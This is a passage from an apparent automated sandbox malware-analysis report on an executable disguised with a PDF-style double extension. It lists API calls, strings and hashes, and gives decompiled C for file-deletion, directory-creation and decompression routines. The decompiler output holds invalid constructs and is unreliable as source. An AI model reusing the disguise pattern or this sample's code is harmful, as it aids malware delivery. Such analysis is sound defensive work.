                                                                      • FindFirstFileW.KERNEL32(00425730,?,?,?,0040A014,?,00425730,?,?,76A63420,76A62EE0,00000000), ref: 00405AAD
                                                                      • FindNextFileW.KERNEL32(00000000,00000010,000000F2,?,?,?,?,0000002E), ref: 00405B4D
                                                                      • FindClose.KERNEL32(00000000), ref: 00405B5C
                                                                      Strings
                                                                      • \*.*, xrefs: 00405A6E
                                                                      • 0WB, xrefs: 00405A5C
                                                                      • "C:\Users\user\Desktop\DPR602859651100125001V1100125154830E 3-2-2023#U00b7pdf.exe", xrefs: 00405A03
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.167508240401.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000002.00000002.167508184127.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000002.00000002.167508327237.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000002.00000002.167508358463.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000002.00000002.167508358463.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000002.00000002.167508358463.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000002.00000002.167508358463.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000002.00000002.167508358463.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000002.00000002.167508358463.0000000000464000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000002.00000002.167508702241.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_400000_DPR602859651100125001V1100125154830E 3-2-2023#U00b7pdf.jbxd
                                                                      Similarity
                                                                      • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                                      • String ID: "C:\Users\user\Desktop\DPR602859651100125001V1100125154830E 3-2-2023#U00b7pdf.exe"$0WB$\*.*
                                                                      • API String ID: 2035342205-4160398837
                                                                      • Opcode ID: bf521971237f06a6bfd3a8137c3f0154ea7fee40ee360af2ff33bb12ffbce5a4
                                                                      • Instruction ID: 3abc1f52a39f62d65ddaa07d2a5323def7e4f5b1e1581b0ba6d8596f0725500f
                                                                      • Opcode Fuzzy Hash: bf521971237f06a6bfd3a8137c3f0154ea7fee40ee360af2ff33bb12ffbce5a4
                                                                      • Instruction Fuzzy Hash: FA41CE30901A18AADB31AB668C89ABF7678EF41714F10427BF801711D1D7BC69829E6E
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00405840 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 39COMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 919 405840-40588b CreateDirectoryW 920 405891-40589e GetLastError 919->920 921 40588d-40588f 919->921 922 4058b8-4058ba 920->922 923 4058a0-4058b4 SetFileSecurityW 920->923 921->922 923->921 924 4058b6 GetLastError 923->924 924->922
                                                                      C-Code - Quality: 100%
                                                                      			E00405840(WCHAR* _a4) {
				struct _SECURITY_ATTRIBUTES _v16;
				struct _SECURITY_DESCRIPTOR _v36;
				int _t22;
				long _t23;

				_v36.Sbz1 = _v36.Sbz1 & 0x00000000;
				_v36.Owner = 0x4083f8;
				_v36.Group = 0x4083f8;
				_v36.Sacl = _v36.Sacl & 0x00000000;
				_v16.bInheritHandle = _v16.bInheritHandle & 0x00000000;
				_v16.lpSecurityDescriptor =  &_v36;
				_v36.Revision = 1;
				_v36.Control = 4;
				_v36.Dacl = 0x4083e8;
				_v16.nLength = 0xc;
				_t22 = CreateDirectoryW(_a4,  &_v16); // executed
				if(_t22 != 0) {
					L1:
					return 0;
				}
				_t23 = GetLastError();
				if(_t23 == 0xb7) {
					if(SetFileSecurityW(_a4, 0x80000007,  &_v36) != 0) {
						goto L1;
					}
					return GetLastError();
				}
				return _t23;
			}







                                                                      0x0040584b
                                                                      0x0040584f
                                                                      0x00405852
                                                                      0x00405858
                                                                      0x0040585c
                                                                      0x00405860
                                                                      0x00405868
                                                                      0x0040586f
                                                                      0x00405875
                                                                      0x0040587c
                                                                      0x00405883
                                                                      0x0040588b
                                                                      0x0040588d
                                                                      0x00000000
                                                                      0x0040588d
                                                                      0x00405897
                                                                      0x0040589e
                                                                      0x004058b4
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x004058b6
                                                                      0x004058ba

                                                                      APIs
                                                                      • CreateDirectoryW.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\), ref: 00405883
                                                                      • GetLastError.KERNEL32 ref: 00405897
                                                                      • SetFileSecurityW.ADVAPI32(?,80000007,00000001), ref: 004058AC
                                                                      • GetLastError.KERNEL32 ref: 004058B6
                                                                      Strings
                                                                      • C:\Users\user\Desktop, xrefs: 00405840
                                                                      • C:\Users\user\AppData\Local\Temp\, xrefs: 00405866
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.167508240401.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000002.00000002.167508184127.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000002.00000002.167508327237.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000002.00000002.167508358463.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000002.00000002.167508358463.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000002.00000002.167508358463.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000002.00000002.167508358463.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000002.00000002.167508358463.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000002.00000002.167508358463.0000000000464000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000002.00000002.167508702241.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_400000_DPR602859651100125001V1100125154830E 3-2-2023#U00b7pdf.jbxd
                                                                      Similarity
                                                                      • API ID: ErrorLast$CreateDirectoryFileSecurity
                                                                      • String ID: C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop
                                                                      • API String ID: 3449924974-26219170
                                                                      • Opcode ID: 6ae7c342d9c1b50a082fcf4789916780a4d0616efa07736c5e287c1420eecf92
                                                                      • Instruction ID: cbd092c4ebd5e7b47652c6b2ce971f8280a433404df7830fbb595f789125ae90
                                                                      • Opcode Fuzzy Hash: 6ae7c342d9c1b50a082fcf4789916780a4d0616efa07736c5e287c1420eecf92
                                                                      • Instruction Fuzzy Hash: 43011A72D00619DAEF10EFA0C9447EFBBB8EF04344F00803AD944B6280E7789614CF99
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 004068DA Relevance: 5.4, APIs: 4, Instructions: 382COMMONCrypto
                                                                      Download Yara Rule
                                                                      C-Code - Quality: 98%
                                                                      			E004068DA() {
				unsigned short _t531;
				signed int _t532;
				void _t533;
				void* _t534;
				signed int _t535;
				signed int _t565;
				signed int _t568;
				signed int _t590;
				signed int* _t607;
				void* _t614;

				L0:
				while(1) {
					L0:
					if( *(_t614 - 0x40) != 0) {
						 *(_t614 - 0x34) = 1;
						 *(_t614 - 0x84) = 7;
						_t607 =  *(_t614 - 4) + 0x180 +  *(_t614 - 0x38) * 2;
						L132:
						 *(_t614 - 0x54) = _t607;
						L133:
						_t531 =  *_t607;
						_t590 = _t531 & 0x0000ffff;
						_t565 = ( *(_t614 - 0x10) >> 0xb) * _t590;
						if( *(_t614 - 0xc) >= _t565) {
							 *(_t614 - 0x10) =  *(_t614 - 0x10) - _t565;
							 *(_t614 - 0xc) =  *(_t614 - 0xc) - _t565;
							 *(_t614 - 0x40) = 1;
							_t532 = _t531 - (_t531 >> 5);
							 *_t607 = _t532;
						} else {
							 *(_t614 - 0x10) = _t565;
							 *(_t614 - 0x40) =  *(_t614 - 0x40) & 0x00000000;
							 *_t607 = (0x800 - _t590 >> 5) + _t531;
						}
						if( *(_t614 - 0x10) >= 0x1000000) {
							L139:
							_t533 =  *(_t614 - 0x84);
							L140:
							 *(_t614 - 0x88) = _t533;
							goto L1;
						} else {
							L137:
							if( *(_t614 - 0x6c) == 0) {
								 *(_t614 - 0x88) = 5;
								goto L170;
							}
							 *(_t614 - 0x10) =  *(_t614 - 0x10) << 8;
							 *(_t614 - 0x6c) =  *(_t614 - 0x6c) - 1;
							 *(_t614 - 0x70) =  &(( *(_t614 - 0x70))[1]);
							 *(_t614 - 0xc) =  *(_t614 - 0xc) << 0x00000008 |  *( *(_t614 - 0x70)) & 0x000000ff;
							goto L139;
						}
					} else {
						__eax =  *(__ebp - 0x5c) & 0x000000ff;
						__esi =  *(__ebp - 0x60);
						__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
						__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
						__ecx =  *(__ebp - 0x3c);
						__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
						__ecx =  *(__ebp - 4);
						(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
						__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
						__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
						 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
						if( *(__ebp - 0x38) >= 4) {
							if( *(__ebp - 0x38) >= 0xa) {
								_t97 = __ebp - 0x38;
								 *_t97 =  *(__ebp - 0x38) - 6;
							} else {
								 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
							}
						} else {
							 *(__ebp - 0x38) = 0;
						}
						if( *(__ebp - 0x34) == __edx) {
							__ebx = 0;
							__ebx = 1;
							L60:
							__eax =  *(__ebp - 0x58);
							__edx = __ebx + __ebx;
							__ecx =  *(__ebp - 0x10);
							__esi = __edx + __eax;
							__ecx =  *(__ebp - 0x10) >> 0xb;
							__ax =  *__esi;
							 *(__ebp - 0x54) = __esi;
							__edi = __ax & 0x0000ffff;
							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
							if( *(__ebp - 0xc) >= __ecx) {
								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
								__cx = __ax;
								__ebx = __edx + 1;
								__cx = __ax >> 5;
								 *__esi = __ax;
							} else {
								 *(__ebp - 0x10) = __ecx;
								0x800 = 0x800 - __edi;
								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
								__ebx = __ebx + __ebx;
								 *__esi = __cx;
							}
							 *(__ebp - 0x44) = __ebx;
							if( *(__ebp - 0x10) >= 0x1000000) {
								L59:
								if(__ebx >= 0x100) {
									goto L54;
								}
								goto L60;
							} else {
								L57:
								if( *(__ebp - 0x6c) == 0) {
									 *(__ebp - 0x88) = 0xf;
									goto L170;
								}
								__ecx =  *(__ebp - 0x70);
								__eax =  *(__ebp - 0xc);
								 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
								__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
								 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
								 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
								_t202 = __ebp - 0x70;
								 *_t202 =  *(__ebp - 0x70) + 1;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
								goto L59;
							}
						} else {
							__eax =  *(__ebp - 0x14);
							__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
							if(__eax >=  *(__ebp - 0x74)) {
								__eax = __eax +  *(__ebp - 0x74);
							}
							__ecx =  *(__ebp - 8);
							__ebx = 0;
							__ebx = 1;
							__al =  *((intOrPtr*)(__eax + __ecx));
							 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
							L40:
							__eax =  *(__ebp - 0x5b) & 0x000000ff;
							 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
							__ecx =  *(__ebp - 0x58);
							__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
							 *(__ebp - 0x48) = __eax;
							__eax = __eax + 1;
							__eax = __eax << 8;
							__eax = __eax + __ebx;
							__esi =  *(__ebp - 0x58) + __eax * 2;
							 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
							__ax =  *__esi;
							 *(__ebp - 0x54) = __esi;
							__edx = __ax & 0x0000ffff;
							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
							if( *(__ebp - 0xc) >= __ecx) {
								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
								__cx = __ax;
								 *(__ebp - 0x40) = 1;
								__cx = __ax >> 5;
								__ebx = __ebx + __ebx + 1;
								 *__esi = __ax;
							} else {
								 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
								 *(__ebp - 0x10) = __ecx;
								0x800 = 0x800 - __edx;
								0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
								__ebx = __ebx + __ebx;
								 *__esi = __cx;
							}
							 *(__ebp - 0x44) = __ebx;
							if( *(__ebp - 0x10) >= 0x1000000) {
								L38:
								__eax =  *(__ebp - 0x40);
								if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
									while(1) {
										if(__ebx >= 0x100) {
											break;
										}
										__eax =  *(__ebp - 0x58);
										__edx = __ebx + __ebx;
										__ecx =  *(__ebp - 0x10);
										__esi = __edx + __eax;
										__ecx =  *(__ebp - 0x10) >> 0xb;
										__ax =  *__esi;
										 *(__ebp - 0x54) = __esi;
										__edi = __ax & 0x0000ffff;
										__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
										if( *(__ebp - 0xc) >= __ecx) {
											 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
											__cx = __ax;
											__ebx = __edx + 1;
											__cx = __ax >> 5;
											 *__esi = __ax;
										} else {
											 *(__ebp - 0x10) = __ecx;
											0x800 = 0x800 - __edi;
											0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
											__ebx = __ebx + __ebx;
											 *__esi = __cx;
										}
										 *(__ebp - 0x44) = __ebx;
										if( *(__ebp - 0x10) < 0x1000000) {
											L45:
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xe;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t155 = __ebp - 0x70;
											 *_t155 =  *(__ebp - 0x70) + 1;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
										}
									}
									L53:
									_t172 = __ebp - 0x34;
									 *_t172 =  *(__ebp - 0x34) & 0x00000000;
									L54:
									__al =  *(__ebp - 0x44);
									 *(__ebp - 0x5c) =  *(__ebp - 0x44);
									L55:
									if( *(__ebp - 0x64) == 0) {
										 *(__ebp - 0x88) = 0x1a;
										goto L170;
									}
									__ecx =  *(__ebp - 0x68);
									__al =  *(__ebp - 0x5c);
									__edx =  *(__ebp - 8);
									 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
									 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
									 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
									 *( *(__ebp - 0x68)) = __al;
									__ecx =  *(__ebp - 0x14);
									 *(__ecx +  *(__ebp - 8)) = __al;
									__eax = __ecx + 1;
									__edx = 0;
									_t191 = __eax %  *(__ebp - 0x74);
									__eax = __eax /  *(__ebp - 0x74);
									__edx = _t191;
									L79:
									 *(__ebp - 0x14) = __edx;
									L80:
									 *(__ebp - 0x88) = 2;
									goto L1;
								}
								if(__ebx >= 0x100) {
									goto L53;
								}
								goto L40;
							} else {
								L36:
								if( *(__ebp - 0x6c) == 0) {
									 *(__ebp - 0x88) = 0xd;
									L170:
									_t568 = 0x22;
									memcpy( *(_t614 - 0x90), _t614 - 0x88, _t568 << 2);
									_t535 = 0;
									L172:
									return _t535;
								}
								__ecx =  *(__ebp - 0x70);
								__eax =  *(__ebp - 0xc);
								 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
								__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
								 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
								 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
								_t121 = __ebp - 0x70;
								 *_t121 =  *(__ebp - 0x70) + 1;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
								goto L38;
							}
						}
					}
					L1:
					_t534 =  *(_t614 - 0x88);
					if(_t534 > 0x1c) {
						L171:
						_t535 = _t534 | 0xffffffff;
						goto L172;
					}
					switch( *((intOrPtr*)(_t534 * 4 +  &M0040717D))) {
						case 0:
							if( *(_t614 - 0x6c) == 0) {
								goto L170;
							}
							 *(_t614 - 0x6c) =  *(_t614 - 0x6c) - 1;
							 *(_t614 - 0x70) =  &(( *(_t614 - 0x70))[1]);
							_t534 =  *( *(_t614 - 0x70));
							if(_t534 > 0xe1) {
								goto L171;
							}
							_t538 = _t534 & 0x000000ff;
							_push(0x2d);
							asm("cdq");
							_pop(_t570);
							_push(9);
							_pop(_t571);
							_t610 = _t538 / _t570;
							_t540 = _t538 % _t570 & 0x000000ff;
							asm("cdq");
							_t605 = _t540 % _t571 & 0x000000ff;
							 *(_t614 - 0x3c) = _t605;
							 *(_t614 - 0x1c) = (1 << _t610) - 1;
							 *((intOrPtr*)(_t614 - 0x18)) = (1 << _t540 / _t571) - 1;
							_t613 = (0x300 << _t605 + _t610) + 0x736;
							if(0x600 ==  *((intOrPtr*)(_t614 - 0x78))) {
								L10:
								if(_t613 == 0) {
									L12:
									 *(_t614 - 0x48) =  *(_t614 - 0x48) & 0x00000000;
									 *(_t614 - 0x40) =  *(_t614 - 0x40) & 0x00000000;
									goto L15;
								} else {
									goto L11;
								}
								do {
									L11:
									_t613 = _t613 - 1;
									 *((short*)( *(_t614 - 4) + _t613 * 2)) = 0x400;
								} while (_t613 != 0);
								goto L12;
							}
							if( *(_t614 - 4) != 0) {
								GlobalFree( *(_t614 - 4));
							}
							_t534 = GlobalAlloc(0x40, 0x600); // executed
							 *(_t614 - 4) = _t534;
							if(_t534 == 0) {
								goto L171;
							} else {
								 *((intOrPtr*)(_t614 - 0x78)) = 0x600;
								goto L10;
							}
						case 1:
							L13:
							__eflags =  *(_t614 - 0x6c);
							if( *(_t614 - 0x6c) == 0) {
								 *(_t614 - 0x88) = 1;
								goto L170;
							}
							 *(_t614 - 0x6c) =  *(_t614 - 0x6c) - 1;
							 *(_t614 - 0x40) =  *(_t614 - 0x40) | ( *( *(_t614 - 0x70)) & 0x000000ff) <<  *(_t614 - 0x48) << 0x00000003;
							 *(_t614 - 0x70) =  &(( *(_t614 - 0x70))[1]);
							_t45 = _t614 - 0x48;
							 *_t45 =  *(_t614 - 0x48) + 1;
							__eflags =  *_t45;
							L15:
							if( *(_t614 - 0x48) < 4) {
								goto L13;
							}
							_t546 =  *(_t614 - 0x40);
							if(_t546 ==  *(_t614 - 0x74)) {
								L20:
								 *(_t614 - 0x48) = 5;
								 *( *(_t614 - 8) +  *(_t614 - 0x74) - 1) =  *( *(_t614 - 8) +  *(_t614 - 0x74) - 1) & 0x00000000;
								goto L23;
							}
							 *(_t614 - 0x74) = _t546;
							if( *(_t614 - 8) != 0) {
								GlobalFree( *(_t614 - 8));
							}
							_t534 = GlobalAlloc(0x40,  *(_t614 - 0x40)); // executed
							 *(_t614 - 8) = _t534;
							if(_t534 == 0) {
								goto L171;
							} else {
								goto L20;
							}
						case 2:
							L24:
							_t553 =  *(_t614 - 0x60) &  *(_t614 - 0x1c);
							 *(_t614 - 0x84) = 6;
							 *(_t614 - 0x4c) = _t553;
							_t607 =  *(_t614 - 4) + (( *(_t614 - 0x38) << 4) + _t553) * 2;
							goto L132;
						case 3:
							L21:
							__eflags =  *(_t614 - 0x6c);
							if( *(_t614 - 0x6c) == 0) {
								 *(_t614 - 0x88) = 3;
								goto L170;
							}
							 *(_t614 - 0x6c) =  *(_t614 - 0x6c) - 1;
							_t67 = _t614 - 0x70;
							 *_t67 =  &(( *(_t614 - 0x70))[1]);
							__eflags =  *_t67;
							 *(_t614 - 0xc) =  *(_t614 - 0xc) << 0x00000008 |  *( *(_t614 - 0x70)) & 0x000000ff;
							L23:
							 *(_t614 - 0x48) =  *(_t614 - 0x48) - 1;
							if( *(_t614 - 0x48) != 0) {
								goto L21;
							}
							goto L24;
						case 4:
							goto L133;
						case 5:
							goto L137;
						case 6:
							goto L0;
						case 7:
							__eflags =  *(__ebp - 0x40) - 1;
							if( *(__ebp - 0x40) != 1) {
								__eax =  *(__ebp - 0x24);
								 *(__ebp - 0x80) = 0x16;
								 *(__ebp - 0x20) =  *(__ebp - 0x24);
								__eax =  *(__ebp - 0x28);
								 *(__ebp - 0x24) =  *(__ebp - 0x28);
								__eax =  *(__ebp - 0x2c);
								 *(__ebp - 0x28) =  *(__ebp - 0x2c);
								__eax = 0;
								__eflags =  *(__ebp - 0x38) - 7;
								0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
								__al = __al & 0x000000fd;
								__eax = (__eflags >= 0) - 1 + 0xa;
								 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
								__eax =  *(__ebp - 4);
								__eax =  *(__ebp - 4) + 0x664;
								__eflags = __eax;
								 *(__ebp - 0x58) = __eax;
								goto L68;
							}
							__eax =  *(__ebp - 4);
							__ecx =  *(__ebp - 0x38);
							 *(__ebp - 0x84) = 8;
							__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
							goto L132;
						case 8:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__eax =  *(__ebp - 4);
								__ecx =  *(__ebp - 0x38);
								 *(__ebp - 0x84) = 0xa;
								__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
							} else {
								__eax =  *(__ebp - 0x38);
								__ecx =  *(__ebp - 4);
								__eax =  *(__ebp - 0x38) + 0xf;
								 *(__ebp - 0x84) = 9;
								 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
								__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
							}
							goto L132;
						case 9:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								goto L89;
							}
							__eflags =  *(__ebp - 0x60);
							if( *(__ebp - 0x60) == 0) {
								goto L171;
							}
							__eax = 0;
							__eflags =  *(__ebp - 0x38) - 7;
							_t258 =  *(__ebp - 0x38) - 7 >= 0;
							__eflags = _t258;
							0 | _t258 = _t258 + _t258 + 9;
							 *(__ebp - 0x38) = _t258 + _t258 + 9;
							goto L75;
						case 0xa:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__eax =  *(__ebp - 4);
								__ecx =  *(__ebp - 0x38);
								 *(__ebp - 0x84) = 0xb;
								__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
								goto L132;
							}
							__eax =  *(__ebp - 0x28);
							goto L88;
						case 0xb:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__ecx =  *(__ebp - 0x24);
								__eax =  *(__ebp - 0x20);
								 *(__ebp - 0x20) =  *(__ebp - 0x24);
							} else {
								__eax =  *(__ebp - 0x24);
							}
							__ecx =  *(__ebp - 0x28);
							 *(__ebp - 0x24) =  *(__ebp - 0x28);
							L88:
							__ecx =  *(__ebp - 0x2c);
							 *(__ebp - 0x2c) = __eax;
							 *(__ebp - 0x28) =  *(__ebp - 0x2c);
							L89:
							__eax =  *(__ebp - 4);
							 *(__ebp - 0x80) = 0x15;
							__eax =  *(__ebp - 4) + 0xa68;
							 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
							goto L68;
						case 0xc:
							L99:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0xc;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t334 = __ebp - 0x70;
							 *_t334 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t334;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							__eax =  *(__ebp - 0x2c);
							goto L101;
						case 0xd:
							goto L36;
						case 0xe:
							goto L45;
						case 0xf:
							goto L57;
						case 0x10:
							L109:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0x10;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t365 = __ebp - 0x70;
							 *_t365 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t365;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							goto L111;
						case 0x11:
							L68:
							__esi =  *(__ebp - 0x58);
							 *(__ebp - 0x84) = 0x12;
							goto L132;
						case 0x12:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__eax =  *(__ebp - 0x58);
								 *(__ebp - 0x84) = 0x13;
								__esi =  *(__ebp - 0x58) + 2;
								goto L132;
							}
							__eax =  *(__ebp - 0x4c);
							 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
							__ecx =  *(__ebp - 0x58);
							__eax =  *(__ebp - 0x4c) << 4;
							__eflags = __eax;
							__eax =  *(__ebp - 0x58) + __eax + 4;
							goto L130;
						case 0x13:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								_t469 = __ebp - 0x58;
								 *_t469 =  *(__ebp - 0x58) + 0x204;
								__eflags =  *_t469;
								 *(__ebp - 0x30) = 0x10;
								 *(__ebp - 0x40) = 8;
								L144:
								 *(__ebp - 0x7c) = 0x14;
								goto L145;
							}
							__eax =  *(__ebp - 0x4c);
							__ecx =  *(__ebp - 0x58);
							__eax =  *(__ebp - 0x4c) << 4;
							 *(__ebp - 0x30) = 8;
							__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
							L130:
							 *(__ebp - 0x58) = __eax;
							 *(__ebp - 0x40) = 3;
							goto L144;
						case 0x14:
							 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
							__eax =  *(__ebp - 0x80);
							goto L140;
						case 0x15:
							__eax = 0;
							__eflags =  *(__ebp - 0x38) - 7;
							0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
							__al = __al & 0x000000fd;
							__eax = (__eflags >= 0) - 1 + 0xb;
